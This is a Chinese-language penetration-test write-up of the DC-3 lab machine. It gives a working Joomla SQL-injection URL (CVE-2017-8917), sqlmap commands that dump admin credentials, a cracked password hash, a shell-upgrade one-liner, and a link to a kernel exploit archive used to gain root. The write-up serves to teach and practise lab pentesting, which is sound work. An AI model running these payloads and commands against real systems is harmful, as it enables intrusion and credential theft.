DC-3 渗透记录

信息收集

收集到靶机ip为:192.168.204.35
并只开放了80端口
IMG_256
IMG_256
访问页面,看到相应的提示,使用nmap全面扫描,得到服务器版本和linux版本

1
2
3
4
5
6
7
8
Flag 1:
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:DD:2E:E3 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop

使用web网站有joomla组件
IMG_256
查询发现joomla存在sql注入漏洞 CVE-2017-8917

进入页面http://192.168.204.35/index.php尝试

1
http://192.168.204.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x7e,concat(0x7e,database()),0x7e)

得到数据库名,证明存在sql注入
IMG_256

sql漏洞利用

这里可以使用sqlmap注入工具

得到数据库名

sqlmap -u “http://192.168.204.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml“ –risk=3 –level=5 –random-agent –dbs -p list[fullordering]
IMG_256

查询到表名

sqlmap -u “http://192.168.204.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml“ –risk=3 –level=5 –random-agent -D joomladb –tables
IMG_256

使用表名进行字段查询

sqlmap -u “http://192.168.204.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml“ –risk=3 –level=5 –random-agent -D joomladb -T “#__users” –columns
IMG_256

查询用户名和密码

sqlmap -u “http://192.168.204.35/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml“ –risk=3 –level=5 –random-agent -D joomladb -T “#__users” -C name,password,username,id –dump
IMG_256

1
2
得到用户名和加密的hash密码
admin | $2y$10$DpfpYjADpejngxNh9GnmCeyIHCWpL97CVRnGeZsVJwR0kWFlfB1Zu

继续从hash入手,尝试破解用户admin的密码
使用 hash识别器 ,还是没有识别出
IMG_256
google之后,发现另外一个爆破工具john(作者本意也是让用这个) 一种在服务器中查找用户弱密码的工具
IMG_256
得到密码 admin/snoopy ,使用刚刚爆破出的管理员后台进入后台
IMG_256
拿到管理员权限 回到刚刚使用的msf漏洞 现在可以使用它进行利用并shell反弹
IMG_256
生成交互shell

python -c”import pty;pty.spawn(‘/bin/bash’)”
IMG_256
尝试提权root 寻找具有suid的命令
IMG_256
尝试之后发现suid提权可能行不通,于是把目光放在操作系统漏洞上
Cat /etc/issue , 发现ubuntu版本16.04 版本较低

1
2
3
4
www-data@DC-3:/var/www/html/templates/beez3$ uname -a
uname -a
Linux DC-3 4.4.0-21-generic #37-Ubuntu SMP Mon Apr 18 18:34:49 UTC 2016 i686 athlon i686 GNU/Linux
www-data@DC-3:/var/www/html/templates/beez3$

IMG_256

使用msf搜索关于ubuntu 16.04的脚本 , 在https://www.exploit-db.com/exploits/45010 查询到了相关的操作系统脚本

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip
IMG_256
下载到服务器并解压exploit.tar 运行脚本
IMG_256
拿到root权限
IMG_256
找到flag
IMG_256

渗透总结

学习了新的CMS工具joomla部分版本存在spl注入漏洞,并使用sqlmap和msf读出数据库配合admin使用后台
学习了john破解hash值
通过操作系统漏洞提权 (操作系统漏洞、suid)